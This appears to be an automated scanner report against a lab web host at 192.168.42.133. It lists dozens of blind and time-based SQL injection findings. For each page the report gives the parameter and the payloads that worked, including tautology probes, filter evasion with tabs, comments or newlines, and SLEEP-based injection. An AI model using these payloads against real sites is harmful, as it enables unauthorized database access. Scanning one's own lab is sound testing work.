Target: http://192.168.42.133 (GET)

---
URL:http://192.168.42.133/sqli/example2.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'76971'='76971
'	and	'65691'='65691
'	or	59057=59057#
'	and	'44574'='44575
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example1.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'76971'='76971
'	and	'65691'='65691
'	or	59057=59057#
'	and	'44574'='44575
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example5.php (GET)
VulnName: blind sqli
Query: {'id': '2'}
Payload: 	and	79918=79918
	and	77608=77608
	or	67745=67745#
	and	47023=47024
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example4.php (GET)
VulnName: blind sqli
Query: {'id': '2'}
Payload: 	and	79918=79918
	and	77608=77608
	or	67745=67745#
	and	47023=47024
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example3.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '/**/and/**/'16331'='16331
'/**/and/**/'39279'='39279
'/**/or/**/64590=64590#
'/**/and/**/'18603'='18604
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example6.php (GET)
VulnName: blind sqli
Query: {'id': '2'}
Payload: 	and	79918=79918
	and	77608=77608
	or	67745=67745#
	and	47023=47024
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example7.php (GET)
VulnName: blind sqli
Query: {'id': '2'}
Payload: 
and
68717=68717

and
28714=28714

or
21234=21234#

and
69858=69859
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/xml/example2.php (GET)
VulnName: blind sqli
Query: {'name': 'hacker'}
Payload: '+and+'14580'='14580
'+and+'81625'='81625
'+or+23830=23830#
'+and+'30049'='30050
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example100.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'76971'='76971
'	and	'65691'='65691
'	or	59057=59057#
'	and	'44574'='44575
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example102.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'76971'='76971
'	and	'65691'='65691
'	or	59057=59057#
'	and	'44574'='44575
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example101.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'76971'='76971
'	and	'65691'='65691
'	or	59057=59057#
'	and	'44574'='44575
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example103.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'76971'='76971
'	and	'65691'='65691
'	or	59057=59057#
'	and	'44574'='44575
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example104.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'76971'='76971
'	and	'65691'='65691
'	or	59057=59057#
'	and	'44574'='44575
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example105.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'76971'='76971
'	and	'65691'='65691
'	or	59057=59057#
'	and	'44574'='44575
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example106.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'76971'='76971
'	and	'65691'='65691
'	or	59057=59057#
'	and	'44574'='44575
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example108.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'76971'='76971
'	and	'65691'='65691
'	or	59057=59057#
'	and	'44574'='44575
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example107.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'76971'='76971
'	and	'65691'='65691
'	or	59057=59057#
'	and	'44574'='44575
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example109.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'76971'='76971
'	and	'65691'='65691
'	or	59057=59057#
'	and	'44574'='44575
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example111.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'76971'='76971
'	and	'65691'='65691
'	or	59057=59057#
'	and	'44574'='44575
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example110.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'76971'='76971
'	and	'65691'='65691
'	or	59057=59057#
'	and	'44574'='44575
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example112.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'76971'='76971
'	and	'65691'='65691
'	or	59057=59057#
'	and	'44574'='44575
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example113.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'76971'='76971
'	and	'65691'='65691
'	or	59057=59057#
'	and	'44574'='44575
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example114.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'76971'='76971
'	and	'65691'='65691
'	or	59057=59057#
'	and	'44574'='44575
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example116.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'76971'='76971
'	and	'65691'='65691
'	or	59057=59057#
'	and	'44574'='44575
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example115.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'76971'='76971
'	and	'65691'='65691
'	or	59057=59057#
'	and	'44574'='44575
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example117.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'76971'='76971
'	and	'65691'='65691
'	or	59057=59057#
'	and	'44574'='44575
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example118.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'76971'='76971
'	and	'65691'='65691
'	or	59057=59057#
'	and	'44574'='44575
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example119.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'76971'='76971
'	and	'65691'='65691
'	or	59057=59057#
'	and	'44574'='44575
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example120.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'76971'='76971
'	and	'65691'='65691
'	or	59057=59057#
'	and	'44574'='44575
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example121.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'76971'='76971
'	and	'65691'='65691
'	or	59057=59057#
'	and	'44574'='44575
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example122.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'76971'='76971
'	and	'65691'='65691
'	or	59057=59057#
'	and	'44574'='44575
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example124.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'76971'='76971
'	and	'65691'='65691
'	or	59057=59057#
'	and	'44574'='44575
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example123.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'76971'='76971
'	and	'65691'='65691
'	or	59057=59057#
'	and	'44574'='44575
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example126.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'76971'='76971
'	and	'65691'='65691
'	or	59057=59057#
'	and	'44574'='44575
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example125.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'76971'='76971
'	and	'65691'='65691
'	or	59057=59057#
'	and	'44574'='44575
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example127.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'76971'='76971
'	and	'65691'='65691
'	or	59057=59057#
'	and	'44574'='44575
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example128.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'76971'='76971
'	and	'65691'='65691
'	or	59057=59057#
'	and	'44574'='44575
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example131.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'76971'='76971
'	and	'65691'='65691
'	or	59057=59057#
'	and	'44574'='44575
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example132.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'76971'='76971
'	and	'65691'='65691
'	or	59057=59057#
'	and	'44574'='44575
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example129.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'76971'='76971
'	and	'65691'='65691
'	or	59057=59057#
'	and	'44574'='44575
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example130.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'76971'='76971
'	and	'65691'='65691
'	or	59057=59057#
'	and	'44574'='44575
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example135.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'76971'='76971
'	and	'65691'='65691
'	or	59057=59057#
'	and	'44574'='44575
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example133.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'76971'='76971
'	and	'65691'='65691
'	or	59057=59057#
'	and	'44574'='44575
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example134.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'76971'='76971
'	and	'65691'='65691
'	or	59057=59057#
'	and	'44574'='44575
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example137.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'76971'='76971
'	and	'65691'='65691
'	or	59057=59057#
'	and	'44574'='44575
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example136.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'76971'='76971
'	and	'65691'='65691
'	or	59057=59057#
'	and	'44574'='44575
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example138.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'76971'='76971
'	and	'65691'='65691
'	or	59057=59057#
'	and	'44574'='44575
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example140.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'76971'='76971
'	and	'65691'='65691
'	or	59057=59057#
'	and	'44574'='44575
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example139.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'76971'='76971
'	and	'65691'='65691
'	or	59057=59057#
'	and	'44574'='44575
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example141.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'76971'='76971
'	and	'65691'='65691
'	or	59057=59057#
'	and	'44574'='44575
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example8.php (GET)
VulnName: time delay sqli vuln
Query: {'order': 'name'}
Payload: ` or SLEEP(3);-- 
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example9.php (GET)
VulnName: time delay sqli vuln
Query: {'order': 'name'}
Payload:  or SLEEP(3);-- 
Advice: use orm
Database: unknown
---